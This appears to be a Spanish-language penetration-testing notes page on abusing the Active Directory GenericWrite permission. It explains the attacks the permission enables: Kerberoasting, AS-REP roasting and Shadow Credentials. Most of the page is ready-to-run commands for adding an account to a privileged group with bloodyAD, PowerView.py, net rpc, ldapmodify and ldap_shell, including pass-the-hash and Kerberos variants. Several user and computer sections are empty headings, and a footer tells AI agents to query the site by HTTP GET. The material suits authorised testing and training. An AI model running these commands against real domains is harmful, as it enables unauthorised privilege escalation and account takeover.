# GenericWrite

## Introduction

En Active Directory, cada objeto (usuario, grupo, equipo…) está protegido por una lista de control de acceso (ACL) cuyo conjunto de entradas (ACE) define qué acciones puede realizar cada identidad. El permiso **GenericWrite** actúa como una “master key” de escritura: engloba casi todos los derechos para modificar atributos y flags de un objeto, salvo aquellos que requieren permisos especiales (p. ej. resetear contraseñas).

Con **GenericWrite** sobre un **usuario** un atacante puede:

* Escribir en **servicePrincipalNames** y lanzar un Kerberoasting dirigido.
* **Habilitar cuentas deshabilitadas** modificando el `userAccountControl`.
* Marcar la bandera **DONT\_REQ\_PREAUTH** en `userAccountControl`, permitiendo AS-REP Roasting sin necesidad de preautenticación.
* Inyectar certificados en **msDS-KeyCredentialLink** para crear “Shadow Credentials” y autenticarse vía Kerberos PKINIT como si fuera ese usuario.

Si controla **GenericWrite** sobre un **grupo**, puede añadirse (o agregar cualquier otra cuenta) directamente al grupo, escalando privilegios al instante.

Y si lo obtiene sobre un **objeto de equipo**, puede tocar el atributo **msDS-KeyCredentialLink** del equipo, generando Shadow Credentials de máquina y autenticándose como esa cuenta de equipo mediante PKINIT.

<div><figure><img src="/files/XP8qamFC8dsko1OM1VBx" alt=""><figcaption><p>GenericWrite over a user</p></figcaption></figure> <figure><img src="/files/dnny5IQWABtY0ejoVkdJ" alt=""><figcaption><p>GenericWrite over a group</p></figcaption></figure></div>

<figure><img src="/files/pmK17MnweeHS1P9KTHjR" alt=""><figcaption></figcaption></figure>

***

## Group

### Add user to a group

En estos ejemplos, añadiremos al usuario `targetUser` al grupo `targetGroup` a través del usuario `attacker` que es el que dispone del privilegio **GenericWrite** sobre el grupo `targetGroup`, con lo cual podemos añadirnos a nosotros mismos o a otros usuarios.

#### From Linux

{% code title="bloodyAD" overflow="wrap" %}

```bash
# User/Password Authentication
bloodyAD --host 10.10.10.10 -d domain.htb -u 'attacker' -p 'Password01!' add groupMember 'targetGroup' 'targetUser'

# Pass-the-Hash (PtH) Authentication
bloodyAD --host 10.10.10.10 -d domain.htb -u 'attacker' -H '01e97f85894e06a5ad698f624b9a7ee9' add groupMember 'targetGroup' 'targetUser'

# Kerberos Authentication (.ccache)
bloodyAD --host dc.domain.htb -d domain.htb -k add groupMember 'targetGroup' 'targetUser'
```

{% endcode %}

{% code title="PowerView\.py" overflow="wrap" %}

```powershell
# Authentication
# ---------------------------------------------------------------------------------- #
## User/Password Authentication ##
powerview domain.htb/attacker:'Password01!'@10.10.10.10 --dc-ip 10.10.10.10
## Pass-the-Hash (PtH) Authentication ##
powerview domain.htb/attacker@10.10.10.10 -H '01e97f85894e06a5ad698f624b9a7ee9' --dc-ip 10.10.10
## Kerberos Authentication (.ccache) ##
powerview domain.htb/attacker@dc.domain.htb -k --no-pass --dc-ip 10.10.10.10

# Command to use
Add-DomainGroupMember -Identity 'targetGroup' -Members 'targetUser'
```

{% endcode %}

{% code title="net rpc" overflow="wrap" %}

```bash
# User/Password Authentication
net rpc group ADDMEM 'targetGroup' 'targetUser' -U 'attacker%Password01!' -W domain.htb -I 10.10.10.10

# Pass-the-Hash (PtH) Authentication
net rpc group ADDMEM 'targetGroup' 'targetUser' -U 'attacker%01e97f85894e06a5ad698f624b9a7ee9' --pw-nt-hash -W domain.htb -I 10.10.10.10
```

{% endcode %}

{% code title="pth-net rpc" overflow="wrap" %}

```bash
# User/Password Authentication
pth-net rpc group addmem 'targetGroup' 'targetUser' -U 'attacker%Password01!' -W domain.htb -I 10.10.10.10

# Pass-the-Hash (PtH) Authentication
pth-net rpc group addmem 'targetGroup' 'targetUser' -U 'attacker%01e97f85894e06a5ad698f624b9a7ee9' --pw-nt-hash -W domain.htb -I 10.10.10.10
```

{% endcode %}

<pre class="language-bash" data-title="ldapmodify" data-overflow="wrap"><code class="lang-bash"># Create add-user-to-group.ldif indicating the DN (of the targetGroup) and the member to add
❯ cat add-user-to-group.ldif
dn: CN=targetGroup,CN=USERS,DC=DOMAIN,DC=HTB
changetype: modify
add: member
member: CN=VICTIM,CN=USERS,DC=DOMAIN,DC=HTB

# Execute command
❯ ldapmodify -x -H ldap://10.10.10.10 -D "CN=attacker,CN=Users,DC=domain,DC=htb" -w 'Password01!' -f add-user-to-group.ldif

# Oneliner alternative method without .ldif
<strong>printf 'dn: CN=targetGroup,CN=USERS,DC=domain,DC=htb\nchangetype: modify\nadd: member\nmember: CN=VICTIM,CN=USERS,DC=domain,DC=htb\n' | ldapmodify -x -H ldap://10.10.10.10 -D "CN=attacker,CN=Users,DC=domain,DC=htb" -w 'Password01!'
</strong></code></pre>

{% code title="ldap\_shell" overflow="wrap" %}

```bash
# Authentication
# ---------------------------------------------------------------------------------- #
## User/Password Authentication ##
ldap_shell domain.htb/attacker:'Password01!' -dc-ip 10.10.10.10
## Pass-the-Hash (PtH) Authentication ##
ldap_shell domain.htb/attacker -hashes 'aad3b435b51404eeaad3b435b51404ee:01e97f85894e06a5ad698f624b9a7ee9' -dc-ip 10.10.10.10
## Kerberos Authentication (.ccache) ##
ldap_shell domain.htb/attacker -k -no-pass -dc-host dc.domain.htb -dc-ip 10.10.10.10

# Command to use
add_user_to_group targetUser targetGroup
```

{% endcode %}

***

#### From Windows

{% code title="Windows net command" %}

```powershell
net group 'targetGroup' 'targetUser' /add /domain
```

{% endcode %}

{% code title="bloodyAD.exe" overflow="wrap" %}

```powershell
# User/Password Authentication
.\bloodyAD.exe --host 10.10.10.10 -d domain.htb -u 'attacker' -p 'Password01!' add groupMember 'targetGroup' 'targetUser'

# Pass-the-Hash (PtH) Authentication
.\bloodyAD.exe --host 10.10.10.10 -d domain.htb -u 'attacker' -H '01e97f85894e06a5ad698f624b9a7ee9' add groupMember 'targetGroup' 'targetUser'

# Kerberos Authentication (.ccache)
.\bloodyAD.exe --host dc.domain.htb -d domain.htb -k add groupMember 'targetGroup' 'targetUser'
```

{% endcode %}

***

## User

### Enable disabled user

***

### Kerberoasting

***

### AS-REP Roasting

***

### Shadow Credentials

***

### Script path

***

## Computer

### Resource-based Constrained Delegation(RBCD Attack)

## References

{% embed url="<https://www.hackingarticles.in/genericwrite-active-directory-abuse/>" %}

{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-acl-ace/#genericallgenericwrite>" %}

{% embed url="<https://books.spartan-cybersec.com/cpad/vulnerabilidades-y-ataques-en-ad/abuso-de-acl/genericwrite-sobre-computador>" %}

{% embed url="<https://bloodhound.specterops.io/resources/edges/generic-write>" %}

{% embed url="<https://github.com/0thm4n3/AD-Red-Team-Hacking-Course/blob/main/45.%20ACL%20-%20GenericWrite%20on%20User>" %}

{% embed url="<https://notes.morph3.blog/abusing-active-directory-acls/genericwrite>" %}

{% embed url="<https://gitee.com/scriptkiddies/hacktricks/blob/master/windows/active-directory-methodology/acl-persistence-abuse.md#abusing-active-directory-aclsaces>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gzzcoo.gitbook.io/pentest-notes/active-directory-pentesting/abusing-active-directory-acls-aces/genericwrite.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.